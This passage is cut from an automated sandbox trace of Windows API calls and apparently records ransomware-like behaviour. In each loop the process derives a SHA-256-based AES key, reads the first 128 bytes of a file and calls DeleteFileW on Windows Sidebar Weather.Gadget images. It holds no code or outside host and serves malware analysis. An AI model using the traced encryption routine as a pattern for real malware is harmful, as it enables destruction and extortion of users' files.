dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0194.091] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0194.091] CryptHashData (hHash=0x284d568, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0194.091] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d528) returned 1 [0194.091] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3c3 [0194.091] ReadFile (in: hFile=0x5ac, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0194.094] CryptDestroyHash (hHash=0x284d568) returned 1 [0194.094] CryptDestroyKey (hKey=0x284d528) returned 1 [0194.094] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0194.095] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\144DPI\\(144DPI)notConnectedStateIcon.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\144dpi\\(144dpi)notconnectedstateicon.png")) returned 0 [0194.096] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0194.096] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0194.096] CryptHashData (hHash=0x284d5e8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0194.096] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d528) returned 1 [0194.096] GetFileSize (in: hFile=0x5bc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3c3 [0194.096] ReadFile (in: hFile=0x5bc, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0194.099] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0194.099] CryptDestroyKey (hKey=0x284d528) returned 1 [0194.099] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0194.100] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\144DPI\\(144DPI)redStateIcon.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\144dpi\\(144dpi)redstateicon.png")) returned 0 [0194.100] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0194.101] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0194.101] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0194.101] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0194.101] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xfe2 [0194.101] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0194.103] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0194.103] CryptDestroyKey (hKey=0x284d568) returned 1 [0194.103] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0194.104] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\15.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\15.png")) returned 0 [0194.105] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0194.106] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0194.106] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0194.106] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0194.106] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xfe2 [0194.106] ReadFile (in: hFile=0x5ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0194.131] CryptDestroyHash (hHash=0x284d528) returned 1 [0194.131] CryptDestroyKey (hKey=0x284d568) returned 1 [0194.131] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0194.132] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\16.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\16.png")) returned 0 [0194.170] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0194.171] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0194.171] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0194.171] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0194.171] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1c0e [0194.171] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0194.182] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0194.182] CryptDestroyKey (hKey=0x284d568) returned 1 [0194.182] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0194.184] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\17.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\17.png")) returned 0 [0194.184] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0194.185] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0194.185] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0194.185] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0194.185] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1c0e [0194.185] ReadFile (in: hFile=0x5ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0194.188] CryptDestroyHash (hHash=0x284d528) returned 1 [0194.188] CryptDestroyKey (hKey=0x284d568) returned 1 [0194.188] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0194.190] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\18.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\18.png")) returned 0 [0194.191] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0194.191] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0194.191] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0194.191] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0194.191] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x17b9 [0194.191] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0194.295] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0194.295] CryptDestroyKey (hKey=0x284d568) returned 1 [0194.295] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0194.297] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\19.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\19.png")) returned 0 [0194.350] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0194.351] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0194.351] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0194.351] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0194.351] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2b [0194.351] ReadFile (in: hFile=0x5ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x2b, lpOverlapped=0x0) returned 1 [0194.353] CryptDestroyHash (hHash=0x284d528) returned 1 [0194.353] CryptDestroyKey (hKey=0x284d568) returned 1 [0194.353] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0194.354] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\1px.gif" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\1px.gif")) returned 0 [0194.355] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0194.398] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0194.398] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0194.398] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0194.398] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1456 [0194.398] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0194.427] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0194.427] CryptDestroyKey (hKey=0x284d568) returned 1 [0194.427] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0194.428] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\2.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\2.png")) returned 0 [0194.429] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0194.429] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0194.429] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0194.429] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0194.429] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x17b9 [0194.430] ReadFile (in: hFile=0x5ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0194.435] CryptDestroyHash (hHash=0x284d528) returned 1 [0194.435] CryptDestroyKey (hKey=0x284d568) returned 1 [0194.435] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0194.437] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\20.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\20.png")) returned 0 [0194.437] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0194.438] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0194.438] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0194.438] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0194.438] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x17b9 [0194.438] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0194.441] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0194.441] CryptDestroyKey (hKey=0x284d568) returned 1 [0194.441] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0194.442] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\21.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\21.png")) returned 0 [0194.443] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0194.444] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0194.444] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0194.444] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0194.444] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x17b9 [0194.444] ReadFile (in: hFile=0x5ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0194.447] CryptDestroyHash (hHash=0x284d528) returned 1 [0194.447] CryptDestroyKey (hKey=0x284d568) returned 1 [0194.447] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0194.448] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\22.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\22.png")) returned 0 [0194.449] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0194.450] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0194.450] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0194.450] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0194.450] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x15c5 [0194.450] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0194.477] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0194.477] CryptDestroyKey (hKey=0x284d568) returned 1 [0194.477] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0194.479] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\23.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\23.png")) returned 0 [0194.480] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0194.481] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0194.481] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0194.481] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0194.481] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x15c5 [0194.481] ReadFile (in: hFile=0x5ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0194.485] CryptDestroyHash (hHash=0x284d528) returned 1 [0194.485] CryptDestroyKey (hKey=0x284d568) returned 1 [0194.485] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0194.486] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\24.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\24.png")) returned 0 [0194.487] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0194.488] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0194.488] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0194.488] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0194.488] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x15c5 [0194.488] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0194.514] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0194.514] CryptDestroyKey (hKey=0x284d568) returned 1 [0194.514] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0194.515] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\25.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\25.png")) returned 0 [0194.517] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0194.518] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0194.518] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0194.518] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0194.518] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13c8 [0194.518] ReadFile (in: hFile=0x5ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0194.521] CryptDestroyHash (hHash=0x284d528) returned 1 [0194.521] CryptDestroyKey (hKey=0x284d568) returned 1 [0194.521] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0194.523] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\26.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\26.png")) returned 0 [0194.525] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0194.526] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0194.526] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0194.526] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0194.526] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13c8 [0194.526] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0194.529] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0194.529] CryptDestroyKey (hKey=0x284d568) returned 1 [0194.529] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0194.530] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\27.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\27.png")) returned 0 [0194.530] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0194.531] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0194.531] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0194.531] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0194.531] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13c8 [0194.531] ReadFile (in: hFile=0x5ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0194.535] CryptDestroyHash (hHash=0x284d528) returned 1 [0194.535] CryptDestroyKey (hKey=0x284d568) returned 1 [0194.535] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0194.536] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\28.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\28.png")) returned 0 [0194.537] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0194.538] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0194.538] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0194.538] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0194.538] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1010 [0194.538] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0194.541] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0194.541] CryptDestroyKey (hKey=0x284d568) returned 1 [0194.541] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) 